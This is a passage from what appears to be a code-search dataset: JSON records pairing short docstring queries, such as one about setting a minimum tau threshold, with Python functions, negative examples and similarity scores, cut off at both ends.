float, dtau : float) -> float:\n pass", "def gamma(x):\n return 0.0", "def __init__(self, ksize_low, ksize_high=None): \n self._sigma_low = 0.3*(ksize_low//2 - 1) + 0.8\n \n if ksize_high is None:\n self._sigma_high = np.sqrt(2)*self._sigma_low\n else:\n self._sigma_high = 0.3*(ksize_high//2 - 1) + 0.8", "def __init__(self, sigma=0.0001):\n self.sigma = sigma", "def gamma(flag, S, K, t, r, sigma, q):\n\n b = r-q\n\n return numerical_gamma(flag, S, K, t, r, sigma, b, f)", "def gamma(self):\r\n raise NotImplementedError('not implemented yet, will use spouge approximation')", "def update_low_sigma_clip(self):\n low_sigma = self.low_sigma_clip.text()\n if low_sigma:\n try:\n self._cache[\"input\"][\"low_sigma_clip\"] = float(low_sigma)\n except ValueError:\n pass\n self.reset_input_style_defaults()\n self.fit_continuum(True)\n self.draw_continuum(True)\n return None", "def _set_ks_static(self, ks):\n self.ks = ks\n if np.max(self.ks) > self._kret:\n self._kret = np.max(self.ks)", "def set_epsilon(value):\n global _EPSILON\n _EPSILON = value", "def set_minVal(self, val):\n self.minVal = val", "def userMinimum(self, new_min: float) -> None:\n self._user_minimum = new_min\n self.reset_limits()", "def setSigma(self, sigma):\n assert len(sigma) == self.explorationlayer.paramdim\n # change the parameters of the exploration layer (owner is self.module)\n self.explorationlayer._setParameters(sigma, self.module)", "def set_mutation(self: A, sigma: tp.Optional[tp.Union[float, \"Array\"]] = None, exponent: tp.Optional[float] = None) -> A:\n if sigma is not None:\n # just replace if an actual Parameter is provided as sigma, else update value (parametrized or not)\n if isinstance(sigma, core.Parameter) or isinstance(self.parameters._content[\"sigma\"], core.Constant):\n self.parameters._content[\"sigma\"] = core.as_parameter(sigma)\n else:\n self.sigma.value = sigma # type: ignore\n if exponent is not None:\n if self.bound_transform is not None and not isinstance(self.bound_transform, trans.Clipping):\n raise RuntimeError(f\"Cannot set logarithmic transform with bounding transform {self.bound_transform}, \"\n \"only clipping and constraint bounding methods can accept itp.\")\n if exponent <= 1.0:\n raise ValueError(\"Only exponents strictly higher than 1.0 are allowed\")\n if np.min(self._value.ravel()) <= 0:\n raise RuntimeError(\"Cannot convert to logarithmic mode with current non-positive value, please update it firstp.\")\n self.exponent = exponent\n return self", "def setMinValue(self, min_value):\r\n\t\tself.MinValue = min_value", "def setMinValue(self, min_value):\r\n\t\tself.MinValue = min_value", "def __init__(self, sigma, multiplier=1e-1):\r\n super().__init__(multiplier=multiplier)\r\n self.sigma = sigma", "def exponent(self, k_min=5.5):\n\n assert isinstance(k_min, (float, int)) and k_min > 0\n deg = [k for k in self.deg if k > k_min]\n summa = sum(map(lambda x: log(x/k_min), deg))\n n = len(deg)\n gamma = 1 + n/summa\n sigma = sqrt(n+1) / summa\n\n self.gamma = gamma\n self.k_min = k_min\n\n return gamma, sigma", "def get_gamma(self):\n if self.is_recurrent:\n return 1.0\n else:\n return 1 / np.power( 1 + self.asset_process.risk_free_rate, 1 / self.n_periods_per_year )", "def set_gaussian(self, X, sigma=0):\n sigma = float(sigma)\n if sigma < 0:\n raise ValueError('sigma should be positive')\n self.set_euclidian(X)\n d = self.weights\n\n if sigma == 0:\n sigma = (d ** 2).mean()\n\n w = np.exp(- (d ** 2) / (2 * sigma))\n self.weights = w", "def set_Ec_min(self, x):\n x = float(x)\n if self.Ec_min != x:\n self.Ec_min = x\n self.Ec[0] = x", "def _get_gamma(self):\n gamma = None\n if self.is_clayey():\n gamma = 16.8 + 0.15*self._data[SoilProperty.N60]\n else:\n gamma = 16 + 0.1 * self._data[SoilProperty.N60]\n gamma=_clamp(gamma,10,2.8*9.81)#do we need this\n return gamma", "def get_scale_parameter(self):\r\n \r\n if self.scale_parameter == 0.0: \r\n shape_in_gamma_func = float(1+(1/self.shape_parameter))\r\n gamma_func = special.gamma(shape_in_gamma_func)\r\n self.scale_parameter = (self.mean_fire_recurrence/gamma_func)\r\n return self.scale_parameter\r\n else:\r\n return self.scale_parameter", "def _estimate_gamma(self, x, gamma_type='quantile'):\n if gamma_type == \"quantile\":\n gamma = self.chi2dist.ppf(self.beta)\n res = True\n elif gamma_type == \"std\":\n gamma = self.chi2dist.mean() + self.beta * self.chi2dist.std()\n res = True\n else:\n raise ValueError(\n 'gamma_type <{}> not available.'.format(str(gamma_type)))\n self.gamma = gamma\n return res", "def update_r(self):\n self.gamma_r = self.gamma_s - self.gamma_q\n self.Sigma_r = self.Sigma_s - self.Sigma_q", "def gamma(num: float) -> float:\n if num <= 0:\n raise ValueError(\"math domain error\")\n if num > 171.5:\n raise OverflowError(\"math range error\")\n elif num - int(num) not in (0, 0.5):\n raise NotImplementedError(\"num must be an integer or a half-integer\")\n elif num == 0.5:\n return sqrt(pi)\n else:\n return 1.0 if num == 1 else (num - 1) * gamma(num - 1)", "def M_sigma(self):\n\n print(\"\", file=self.logfile)\n print(\"Updating sigma_2\", file=self.logfile)\n self.sigma2 = 1/self.L_h*(np.square(np.linalg.norm(self.w)) + np.trace(self.R))", "def setGamma(self, g):\n return self._set(gamma=g)", "def sigma(self):\n return self.__sigma", "def initializeDistribution(self):\n self.minVal = min(math.exp(self.upperBound),math.exp(self.lowerBound))\n self.maxVal = max(math.exp(self.upperBound),math.exp(self.lowerBound))", "def set_min(self, min):\n self.set_val((min, self.val[1]))", "def __init__(self, precision=0, random_generator=random.Random(), minimum_stochastic_distance=0):\n super(StochasticRound, self).__init__(precision=precision)\n self.random_generator = random_generator\n self.minimum_stochastic_distance = minimum_stochastic_distance", "def set_stdeviations(self, sigma):\n stdeviations = np.ones(len(self.phenotypes)) * sigma\n self.data['stdeviations'] = stdeviations\n return self", "def __init__(self, sigma):\n self.sigma = float(sigma)\n super().__init__(domain=functional.domain,\n range=functional.domain, linear=False)\n\n # Setting up parameters\n self.const = 1 / (functional.epsilon * sigma)", "def update_detection_sigma(self):\n try:\n value = float(self.edit_detection_sigma.text())\n except:\n value = None\n self._get_selected_model().metadata[\"detection_sigma\"] = value\n return None", "def gamma(self) -> float:\n return self._gamma", "def gamma(self):\n if self._gamma is None:\n df = self.kdf\n gamma_ = -self._powerlaw(df.index, df.freq)\n self._gamma = gamma_\n\n # return\n return self._gamma", "def fitGammaFun(self, x, y):\n minGamma = 0.8\n maxGamma = 20.0\n gammaGuess = 2.0\n y = numpy.asarray(y)\n minLum = y[0]\n maxLum = y[-1]\n if self.eq == 4:\n aGuess = old_div(minLum, 5.0)\n kGuess = (maxLum - aGuess)**(old_div(1.0, gammaGuess)) - aGuess\n guess = [gammaGuess, aGuess, kGuess]\n bounds = [[0.8, 5.0], [0.00001, minLum - 0.00001], [2, 200]]\n else:\n guess = [gammaGuess]\n bounds = [[0.8, 5.0]]\n # gamma = optim.fmin(self.fitGammaErrFun, guess, (x, y, minLum, maxLum))\n # gamma = optim.fminbound(self.fitGammaErrFun,\n # minGamma, maxGamma,\n # args=(x,y, minLum, maxLum))\n params = optim.fmin_tnc(self.fitGammaErrFun, numpy.array(guess),\n approx_grad=True,\n args=(x, y, minLum, maxLum),\n bounds=bounds, messages=0)\n return minLum, maxLum, params", "def gamma(self) -> int:\n return self.params.gamma", "def set_priors(self,alpha):\n\n\t\tassert type(alpha) == float\n\t\tself.alpha = alpha", "def get_scale_parameter(self):\n\n if self.scale_parameter == 0.0:\n shape_in_gamma_func = float(1+(1/self.shape_parameter))\n gamma_func = special.gamma(shape_in_gamma_func)\n self.scale_parameter = (self.mean_fire_recurrence/gamma_func)\n return self.scale_parameter\n else:\n return self.scale_parameter", "def __init__(self, mu=1.0, sigma=1.0):\n self.mu = float(mu)\n self.sigma = float(sigma)", "def _sigma_1(gam, eps):\n s1 = 4 * r0**2 * alpha / eps / mec2_unit\n s2 = 1 + (1./3. - eps/gam) * (1 - eps/gam)\n s3 = np.log(2 * gam * (gam - eps) / eps) - 1./2.\n s3[np.where(gam < eps)] = 0.0\n return s1 * s2 * s3", "def gamma_natural(A):\n return 2.6544188e-12*A", "def __init__(self):\n BuiltinFunction.__init__(self, \"gamma\", nargs=2, latex_name=r\"\\Gamma\",\n conversions={'maxima':'gamma_incomplete', 'mathematica':'Gamma',\n 'maple':'GAMMA', 'sympy':'uppergamma'})", "def gauss(x, gamma):\n return 1 / np.sqrt(2*np.pi) / gamma * np.exp(-(x/gamma)**2 / 2)", "def _gamma(self, nOrT : float) -> vector:\n pass", "def __init__(self, mu=None, sigma=1.):\n self.mu = mu\n self.sigmasqr = sigma**2", "def get_scale_parameter(self):\n\n shape_in_gamma_func = float(1 + (1 / self._shape_parameter))\n gamma_func = special.gamma(shape_in_gamma_func)\n self._scale_parameter = self._mean_fire_recurrence / gamma_func", "def gauss(x, x0, gamma):\n sigma = gamma / sqrt(2.0)\n \n A = 1/ (sigma * sqrt(2*pi))\n return (A * exp (-0.5 * (x-x0)**2/sigma**2))", "def gamma(x):\r\n gammax = ((x + 0.055) / 1.055) ** 2.4 if x > 0.04045 else x / 12.92\r\n return gammax", "def smale_gamma(f, x0, df, args=()):\n _args = (x0,) + args\n gammas = numpy.zeros(len(df)-1, dtype=numpy.double)\n\n scale = 1. / df[0](*_args)\n for k in range(1, len(df)):\n scale /= (k + 1.) # efficiently compute 1/(dfx0 * k!)\n gammas[k-1] = numpy.abs(scale * df[k](*_args))**(1./k)\n\n gamma = gammas.max()\n return gamma", "def calculate_gamma(self):\n result = self.result\n # scaler = preprocessing.StandardScaler()\n # train_minmax = scaler.fit_transform(result)\n # st_rho, st_delta = train_minmax[:, 0], train_minmax[:, 1]\n # self.gamma = (st_delta + st_rho) / 2\n self.gamma = result[:, 0] * result[:, 1]\n self.gamma_des_index = np.argsort(-self.gamma)", "def gaussed_value(self):\n from random import gauss\n return sorted([0, int(gauss(self.value, self.sigma)), \\\n (self.size*8)-1])[1]", "def vary(num, sigma):\n\tvalue = random.gauss(num, sigma)\n\treturn min(255, max(0, value))", "def set_normal_free_energy(self):\n\t\t\n\t\tself.eps_base = self.mu_eps + self.normal_eps_tuning_prefactor* \\\n\t\t\t\t\t\tsp.exp(-(1.*sp.arange(self.Mm))**2.0/(2.0* \\\n\t\t\t\t\t\tself.normal_eps_tuning_width)**2.0)\n\t\t\t\t\t\t\n\t\tself.eps_base += random_matrix(self.Mm, params=[0, self.sigma_eps], \n\t\t\t\t\t\t\t\t\t\tseed=self.seed_eps)\n\t\t\n\t\t# If dual signal, use the average of the FULL signal nonzero components\n\t\tif self.Kk_split == 0:\n\t\t\tself.eps = self.WL_scaling*sp.log(self.mu_Ss0) + self.eps_base \n\t\telse:\n\t\t\tself.eps = self.WL_scaling*sp.log(sp.average(self.Ss\\\n\t\t\t\t\t\t\t[self.Ss != 0])) + self.eps_base\n\t\t\n\t\t# Apply max epsilon value to each component\n\t\tfor iM in range(self.Mm):\n\t\t\tif self.eps[iM] > self.max_eps:\n\t\t\t\tself.eps[iM] = self.max_eps\n\t\t\tif self.eps[iM] < self.min_eps:\n\t\t\t\tself.eps[iM] = self.min_eps", "def normalize_tree(tree, sigma):\r\n if len(tree) == 3:\r\n normalize_tree(tree[1], sigma)\r\n normalize_tree(tree[2], sigma)\r\n else:\r\n tree[0] = sigma / sqrt(tree[0].real)\r\n tree[1] = 0", "def const_sigma(self):\n if self.sigma is None:\n return (1 - 2 / self.eta) * np.eye(self.ndim)\n else:\n return np.array(self.sigma)", "def _a(self, gamma):\n\n a = np.sqrt(2 * self.kb * self.T * gamma)\n\n return a", "def gamma_star(self):\n return self.reciprocal_lattice_parameters[5]", "def set_default_gpa(cls, default_gpa):\n if cls.MIN_GPA <= default_gpa <= cls.MAX_GPA:\n cls.default_gpa = default_gpa\n else:\n raise ValueError", "def min_ems(self, value) -> 'Size':\n raise_not_number(value)\n self.minimum = '{}em'.format(value)\n return self", "def setMinValue(self, min_value):\r\n\t\tself.MinValue = min_value\r\n\t\tself.OutputValueIncrement = (self.MaxValue - self.MinValue)/(self.RampDuration/self.Ts)", "def setMinValue(self, min_value):\r\n\t\tself.MinValue = min_value\r\n\t\tself.OutputValueIncrement = (self.MaxValue - self.MinValue)/(self.RampDuration/self.Ts)", "def set_xmin(self, xmin):\n self.__xmin = xmin", "def adjust_gamma(self, gamma=0.2) -> tf.Tensor:\n return tf.image.adjust_gamma(self.__frame, gamma=gamma)", "def min_value(self, state, min_alpha, min_beta, min_depth):\r\n if state.terminal_test():\r\n return state.utility(0)\r\n if min_depth <=0 :\r\n return self.score(state)\r\n\r\n v = float(\"inf\")\r\n for a in state.actions():\r\n v = min(v, self.max_value(state.result(a), min_alpha, min_beta, min_depth - 1))\r\n if v <= min_alpha:\r\n return v\r\n min_beta = min(min_beta, v)\r\n return v", "def setValues(\n self,\n distributionType: SymbolicConstant = UNIFORM,\n sigma11: float = None,\n sigma22: float = None,\n sigma33: float = None,\n sigma12: float = None,\n sigma13: float = None,\n sigma23: float = None,\n ):\n pass", "def updateMeanAndVar(X, log_gamma, varianceFloor=5.0):", "def zeroLJForce(sigma):\n return 2**(1/6) * sigma", "def _estimate_gamma(self, x, gamma_type='quantile', **kwargs):\n if gamma_type == \"data\":\n return super()._estimate_gamma(x, gamma_type='quantile')\n\n res = True\n if gamma_type == \"quantile\":\n gamma = self._chi2dist.ppf(self.beta)\n elif gamma_type == \"std\":\n gamma = self._chi2dist.mean() + self.beta * self._chi2dist.std()\n else:\n res = False\n raise ValueError(\n 'gamma_type <{}> not available.'.format(str(gamma_type)))\n self.gamma = gamma\n return res", "def test_min_root_gb_filter(self):\n filters = dict(min_root_gb=80)\n expected = [\n 'cg1.2xlarge',\n 'cg1.4xlarge',\n 'cg1.large',\n 'cg1.xlarge',\n 'm1.large',\n 'm1.xlarge',\n 'sh1.16xlarge',\n 'sh1.2xlarge',\n 'sh1.32xlarge',\n 'sh1.4xlarge',\n 'sh1.8xlarge',\n 'sh1.large',\n 'sh1.xlarge',\n 'tp64.8x8']\n self.assertFilterResults(filters, expected)", "def __init__(self):\n BuiltinFunction.__init__(self, \"gamma_inc_lower\", nargs=2, latex_name=r\"\\gamma\",\n conversions={'maxima':'gamma_greek', 'mathematica':'Gamma',\n 'maple':'GAMMA', 'sympy':'lowergamma'})", "def test_approximate_gamma(self, k):\n mean_column = prior.PriorParams.field_index(\"mean\")\n var_column = prior.PriorParams.field_index(\"var\")\n x = self.priors[self.n][k][mean_column]\n xvar = self.priors[self.n][k][var_column]\n # match mean/variance\n alpha_0, beta_0 = approximate_gamma_mom(x, xvar)\n ck_x = alpha_0 / beta_0\n ck_xvar = alpha_0 / beta_0**2\n assert np.isclose(x, ck_x)\n assert np.isclose(xvar, ck_xvar)\n # match approximate sufficient statistics\n logx, _, _ = approx.approximate_log_moments(x, xvar)\n alpha_1, beta_1 = approx.approximate_gamma_kl(x, logx)\n ck_x = alpha_1 / beta_1\n ck_logx = hypergeo._digamma(alpha_1) - np.log(beta_1)\n assert np.isclose(x, ck_x)\n assert np.isclose(logx, ck_logx)\n # compare KL divergence between strategies\n kl_0 = kl_divergence(\n lambda x: conditional_coalescent_pdf(x, self.n, k),\n lambda x: scipy.stats.gamma.logpdf(x, alpha_0, scale=1 / beta_0),\n )\n kl_1 = kl_divergence(\n lambda x: conditional_coalescent_pdf(x, self.n, k),\n lambda x: scipy.stats.gamma.logpdf(x, alpha_1, scale=1 / beta_1),\n )\n assert kl_1 < kl_0", "def maximize_one(self, gamma, xisum, c, x_digits):\n log_likelihood = np.log(c).sum()\n self._i = gamma[0] / gamma[0].sum()\n self._t = (xisum.T / xisum.sum(1)).T\n self._e = np.dot(x_digits, gamma) / gamma.sum(0)\n return log_likelihood", "def min_value(self, min_value):\n\n self._min_value = min_value", "def min_value(self, min_value):\n\n self._min_value = min_value", "def min_value(self, min_value):\n\n self._min_value = min_value", "def optimalGaussian(mu, sigma):\r\n \r\n optimal = gaussian(mu, sigma, mu-3.5*sigma, mu+3.5*sigma) #Calculate values of optimal gaussian\r\n def simulationTestGaussian2(params):\r\n \"\"\"\r\n Compare a gaussian with optimal gaussian\r\n \"\"\"\r\n x = gaussian(params[0], params[1], mu-3.5*sigma, mu+3.5*sigma)\r\n error = np.sum(np.power(optimal - x, 2))/optimal.shape[0]\r\n return 1/error\r\n return simulationTestGaussian2", "def _handleInput(self, paramInput):\n super()._handleInput(paramInput)\n lowFind = paramInput.findFirst('low')\n if lowFind != None:\n self.low = lowFind.value\n alphaFind = paramInput.findFirst('alpha')\n if alphaFind != None:\n self.alpha = alphaFind.value\n else:\n self.raiseAnError(IOError,'alpha value needed for Gamma distribution')\n betaFind = paramInput.findFirst('beta')\n if betaFind != None:\n self.beta = betaFind.value\n # check if lower bound are set, otherwise default\n if not self.lowerBoundUsed:\n self.lowerBoundUsed = True\n self.lowerBound = self.low\n self.initializeDistribution() #TODO this exists in a couple classes; does it really need to be here and not in Simulation? - No. - Andrea", "def gaussian(\n x: float,\n measurement: 'mstats.ValueUncertainty',\n max_sigma: float = 10.0\n) -> float:\n center = measurement.value\n width = measurement.uncertainty\n width = max(width, 1e-6)\n\n if x <= (center - max_sigma * width) or x >= (center + max_sigma * width):\n # Don't calculate values outside a \"reasonable\" 10 sigma range\n return 0.0\n\n coefficient = 1 / math.sqrt(2.0 * math.pi * width * width)\n exponent = -0.5 * ((float(x) - center) ** 2) / (width * width)\n\n return coefficient * math.exp(exponent)", "def sigma(self, sigma_input):\n sigma_out = make_sigma.sigma_gen(self._parent.settings, sigma_input)\n # Assign to parent ICobj:\n self._parent.sigma = sigma_out\n print 'Sigma stored in <IC instance>.sigma'", "def __init__(self, \n param_epsilon, \n param_tau,\n param_u, \n param_gamma_left,\n param_gamma_right,\n param_beta):\n self.epsilon = param_epsilon\n self.tau = param_tau\n self.u = param_u\n self.gamma_left = param_gamma_left\n self.gamma_right = param_gamma_right\n \n self.sigma_retarded = 1j * (self.gamma_left + self.gamma_right) / 2.0\n self.sigma_advanced = - self.sigma_retarded;\n \n self.dim = len(self.u)\n self.rho = np.zeros((2**self.dim))\n \n self.beta = param_beta\n \n self.cutoff_chance = 0.0001\n self.external_distribution = False\n self.external_distribution_array = self.distribution()\n self.external_distribution = True", "def _min_value(\r\n self,\r\n state: TwoPlayerGameState,\r\n alpha: float,\r\n beta: float,\r\n depth: int,\r\n ) -> float:\r\n if state.end_of_game or depth == 0:\r\n phi = self.heuristic.evaluate(state)\r\n else:\r\n phi = np.inf\r\n\r\n successors = self.generate_successors(state)\r\n for successor in successors:\r\n if self.verbose > 1:\r\n print('{}: {}'.format(state.board, phi))\r\n\r\n successor_alpha = self._max_value(\r\n successor, alpha, beta, depth - 1\r\n )\r\n\r\n # Minimizing the max value\r\n if (successor_alpha < phi):\r\n phi = successor_alpha\r\n\r\n # Pruning\r\n if phi <= alpha:\r\n return phi\r\n\r\n beta = min(beta, phi)\r\n\r\n if self.verbose > 1:\r\n print('{}: {}'.format(state.board, beta))\r\n\r\n return phi", "def _change_spacing(self, **kwargs):\n start_point = kwargs.get(\"start_point\")\n end_point = kwargs.get(\"end_point\")\n self.t[start_point:end_point] *= kwargs.get(\"gamma\")\n self._base(**kwargs)", "def _onSetParameterLower(self, value):\n self._parameters['lower'] = min(value, self._parameters['upper']) # Limit at upper\n self._logger.info(\"Parameter 'lower' of function '{}' changed to {}\".format(self._function, value))\n self.functionChanged.emit(self._dim, self._function, self._parameters.copy())", "def update_high_sigma_clip(self):\n high_sigma = self.high_sigma_clip.text()\n if high_sigma:\n try:\n self._cache[\"input\"][\"high_sigma_clip\"] = float(high_sigma)\n except ValueError:\n pass\n self.reset_input_style_defaults()\n self.fit_continuum(True)\n self.draw_continuum(True)\n return None", "def _set_minimum_value(self, value):\n # Check if the current value is not None, and if so, throw an error\n # because this property should not be set twice\n if self._get_minimum_value() is not None:\n raise RuntimeError('maximum value should not be set twice')\n\n # If the value is None, ignore it\n if value is None:\n return\n\n # Set the value\n self._minimum_value = value", "def fit_gamma_lsq(t, s, beta, u0, bounds=(0, np.inf), fix_s0=False):\n s = s.A.flatten() if issparse(s) else s\n\n tau = t - np.min(t)\n s0 = np.mean(s[tau == 0])\n g0 = beta * u0 / s0\n\n if fix_s0:\n f_lsq = lambda g: sol_s(tau, s0, u0, 0, beta, g) - s\n ret = least_squares(f_lsq, g0, bounds=bounds)\n gamma = ret.x\n else:\n if np.isfinite(g0):\n f_lsq = lambda p: sol_s(tau, p[1], u0, 0, beta, p[0]) - s\n ret = least_squares(f_lsq, np.array([g0, s0]), bounds=bounds)\n gamma = ret.x[0]\n s0 = ret.x[1]\n else:\n gamma, s0 = np.nan, 0\n return gamma, s0", "def _eta_sfr_scaling(self,x,q):\n i = self.enum[q]\n A = self.scaling_params['A'][i]\n b = self.scaling_params['b'][i]\n return A*x**b", "def gaussian_prior(self):\n self.prior = sps.multivariate_normal(self.m0,self.S0)", "def getGamma(self):\n\t\treturn self.relativistic_gamma" ]
[ "0.6821172", "0.6443684", "0.64384013", "0.6321744", "0.6190171", "0.5993369", "0.59834427", "0.5934069", "0.5904044", "0.5883485", "0.5871269", "0.5817794", "0.58008724", "0.57933", "0.5751669", "0.569705", "0.5695616", "0.56666064", "0.5641036", "0.5599601", "0.5595213", "0.5593684", "0.5573322", "0.5573322", "0.55656", "0.5554882", "0.5554297", "0.5523239", "0.5521399", "0.55123705", "0.546586", "0.5441435", "0.542842", "0.54248327", "0.5424227", "0.54079217", "0.5395123", "0.53824073", "0.53783303", "0.53447515", "0.53200406", "0.531505", "0.531109", "0.530326", "0.5299115", "0.5284732", "0.52827376", "0.5277398", "0.527482", "0.5271354", "0.525188", "0.52485114", "0.52382666", "0.52253824", "0.52030253", "0.51760715", "0.51715195", "0.5170219", "0.51693594", "0.5163245", "0.5148406", "0.5142734", "0.5141318", "0.5136793", "0.5130625", "0.51302505", "0.5126546", "0.5115221", "0.51080316", "0.5105443", "0.5100996", "0.5100996", "0.5083416", "0.5078261", "0.5076869", "0.50753427", "0.50735015", "0.50707793", "0.5055821", "0.5047582", "0.50425833", "0.503823", "0.50289977", "0.5028362", "0.5028362", "0.5028362", "0.5025642", "0.5023279", "0.50224996", "0.5022252", "0.5019545", "0.5019268", "0.5015629", "0.5013415", "0.5004213", "0.49966902", "0.49940512", "0.4993174", "0.49904773", "0.49903145" ]
0.53603756
39
Sets the smallest value allowed for tau. Smaller values than this get overwritten in the evaluation.
def set_tau_threshold(self, tau_threshold): if tau_threshold < 0: raise ValueError("The tau threshold cannot be smaller than 0.") core.xc_func_set_tau_threshold(self.xc_func, ctypes.c_double(tau_threshold))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self,tau = 1e-3):\n self._tau = tau \n pass", "def __init__(self, tau=1, eps=None):\n self.tau = tau\n self.eps = eps or np.finfo(config.precision).eps\n self.rng = np.random.default_rng()\n self.smax = Softmax()", "def init_tau(self, type: str = 'safest', weight: float = 1.5):\n\n P = self.toeplitz_op.P\n weighted_gram = 2 * self.linear_op.gram\n if self.beta is not None:\n beta = self.beta\n else:\n try:\n beta = eigs(weighted_gram, k=1, which='LM', return_eigenvectors=False, tol=self.eig_tol)\n beta *= (1 + self.eig_tol)\n except Exception('Eigs solver did not converge, trying again with small tolerance...'):\n beta = eigs(weighted_gram, k=1, which='LM', return_eigenvectors=False, tol=1e-3)\n beta *= (1 + 1e-3)\n ub = 1 / beta * (1 + 1 / np.sqrt(P + 1))\n lb = 1 / beta * (1 - 1 / np.sqrt(P + 1))\n if type == 'fastest':\n try:\n alpha = eigs(weighted_gram, k=1, which='SM', return_eigenvectors=False, tol=self.eig_tol)\n alpha *= (1 + self.eig_tol)\n except Exception('Eigs solver did not converge. Alpha is set to zero.'):\n alpha = 0\n tau_opt = 2 / (beta + alpha)\n if (tau_opt <= ub) & (tau_opt >= lb):\n self.tau = tau_opt\n else:\n min_lb = np.fmin(np.abs(1 - lb * alpha), np.abs(1 - lb * beta))\n min_ub = np.fmin(np.abs(1 - ub * alpha), np.abs(1 - ub * beta))\n if np.argmin([min_lb, min_ub]) == 0:\n self.tau = lb\n else:\n self.tau = ub\n elif type == 'safest':\n self.tau = 1 / beta\n elif type == 'largest':\n self.tau = ub\n else:\n self.tau = weight / beta", "def tau_V(self, value):\n if not (self.tau_V_range[0] <= value <= self.tau_V_range[1]):\n raise InputParameterError(\n \"parameter tau_V must be between \"\n + str(self.tau_V_range[0])\n + \" and \"\n + str(self.tau_V_range[1])\n )", "def changetau(self, tau):\n if tau == self.tau:\n return self\n elif tau < self.tau:\n return AsymptoticTimeInvariant(self.v[self.tau - tau: tau + self.tau - 1])\n else:\n v = np.zeros(2*tau-1)\n v[tau - self.tau: tau + self.tau - 1] = self.v\n return AsymptoticTimeInvariant(v)", "def getTau(self) -> float:\n return self.tau", "def set_minVal(self, val):\n self.minVal = val", "def set_min(self, min):\n self.set_val((min, self.val[1]))", "def setMinValue(self, min_value):\r\n\t\tself.MinValue = min_value\r\n\t\tself.OutputValueIncrement = (self.MaxValue - self.MinValue)/(self.RampDuration/self.Ts)", "def setMinValue(self, min_value):\r\n\t\tself.MinValue = min_value\r\n\t\tself.OutputValueIncrement = (self.MaxValue - self.MinValue)/(self.RampDuration/self.Ts)", "def __init__(self, tau=1, dim=None, inplace=False):\n super(GumbelSoftmax, self).__init__()\n self.tau = tau\n self.dim = dim\n self.inplace = inplace", "def set_Ec_min(self, x):\n x = float(x)\n if self.Ec_min != x:\n self.Ec_min = x\n self.Ec[0] = x", "def set_tr(self, x):\n x = float(x)\n if self.tr != x:\n self.tr = x", "def setMinValue(self, min_value):\r\n\t\tself.MinValue = min_value", "def setMinValue(self, min_value):\r\n\t\tself.MinValue = min_value", "def _set_bet_limit(self) -> None:\n for i, ratio in enumerate(BET_LIMIT_RATIOS):\n self._bet_limits[i] = self._treasury_min.get() // ratio", "def min_temp(self):\n return 1", "def min_value(self) -> float:\n return DEFAULT_MIN_VALUE", "def __init__(self, value):\n self.value = max(min(value,1.0),-1.0)", "def __init__(self, value):\n self.value = max(min(value,1.0),-1.0)", "def reset(self):\n self.value = self.min_value", "def initial_value(self) -> float:\n return self._initial_value", "def tau_turnover(self):\n return self.tau_batch/self.N_trains", "def set_locked_temp_min(self, value: int = 0):\r\n if self._temperature_scale == \"F\":\r\n self._locked_temp_min = celsius_to_kelvin(\r\n fahrenheit_to_celsius(value)\r\n )\r\n elif self._temperature_scale == \"C\":\r\n self._locked_temp_min = celsius_to_kelvin(value)\r\n else:\r\n self._locked_temp_min = value\r\n\r\n self._logger.info(log_message_formatter(\r\n \"set\", f\"{self}\", \"locked_temp_min\", value))", "def set_tin(self, tin):\n self.tin = tin[:]", "def inc_tau_trans(self):\r\n self.num_tau_trans += 1", "def test_set_pT(self):\n s = State(substance=\"water\")\n s.pT = Q_(101325.0, \"Pa\"), Q_(400.0, \"K\")\n # Pylance does not support NumPy ufuncs\n assert np.isclose(s.T, Q_(400.0, \"K\")) # type: ignore\n assert np.isclose(s.p, Q_(101325.0, \"Pa\")) # type: ignore\n assert np.isclose(s.pT[1], Q_(400.0, \"K\")) # type: ignore\n assert np.isclose(s.pT[0], Q_(101325.0, \"Pa\")) # type: ignore\n assert np.isclose(s.u, Q_(2547715.3635084038, \"J/kg\")) # type: ignore\n assert np.isclose(s.s, Q_(7496.2021523754065, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.cp, Q_(2009.2902478486988, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.cv, Q_(1509.1482452129906, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.v, Q_(1.801983936953226, \"m**3/kg\")) # type: ignore\n assert np.isclose(s.h, Q_(2730301.3859201893, \"J/kg\")) # type: ignore\n assert s.x is None\n assert s.phase == \"gas\"", "def userMinimum(self, new_min: float) -> None:\n self._user_minimum = new_min\n self.reset_limits()", "def set_t_FAST(self):\n\t\n\tself.N = 2**7\n\tdt = self.Orbit.Tobs/self.N\n\tself.t = np.linspace(0, self.N-1, self.N)*self.Orbit.Tobs/self.N\n\t\n\treturn", "def native_min_value(self) -> float:\n return TEMP_MINIMUM", "def test_set_uT(self):\n s = State(substance=\"water\")\n s.uT = Q_(2547715.3635084038, \"J/kg\"), Q_(400.0, \"K\")\n # Pylance does not support NumPy ufuncs\n assert np.isclose(s.T, Q_(400.0, \"K\")) # type: ignore\n assert np.isclose(s.p, Q_(101325.0, \"Pa\")) # type: ignore\n assert np.isclose(s.uT[1], Q_(400.0, \"K\")) # type: ignore\n assert np.isclose(s.uT[0], Q_(2547715.3635084038, \"J/kg\")) # type: ignore\n assert np.isclose(s.u, Q_(2547715.3635084038, \"J/kg\")) # type: ignore\n assert np.isclose(s.s, Q_(7496.2021523754065, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.cp, Q_(2009.2902478486988, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.cv, Q_(1509.1482452129906, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.v, Q_(1.801983936953226, \"m**3/kg\")) # type: ignore\n assert np.isclose(s.h, Q_(2730301.3859201893, \"J/kg\")) # type: ignore\n assert s.x is None", "def get_tau_gap(vals,tau): \n ans = 0.0\n m = 0.0\n N = len(vals)\n for i in range(N):\n ai = 2.0*vals[i]-1\n if ai > 0:\n m += 1\n tmp = 0.0\n if tau >= 0: # votes close to 50% are weighed more (\"traditional\")\n if ai >= 0: \n tmp = pow(ai,tau+1)\n else:\n tmp = -pow(-ai,tau+1)\n else: # votes close to 50% are weighed less \n if ai >= 0:\n tmp = pow((1-ai),-tau+1)\n else:\n tmp = -pow((1+ai),-tau+1)\n ans += tmp\n \n if tau >= 0:\n return 2.0*(ans/N + 0.5 - m/N)\n else:\n return -2.0*(ans/N + 0.5 - m/N)", "def _set_minimum(self, time):\n if time > self._maximum:\n self._maximum = time\n self._minimum = time", "def 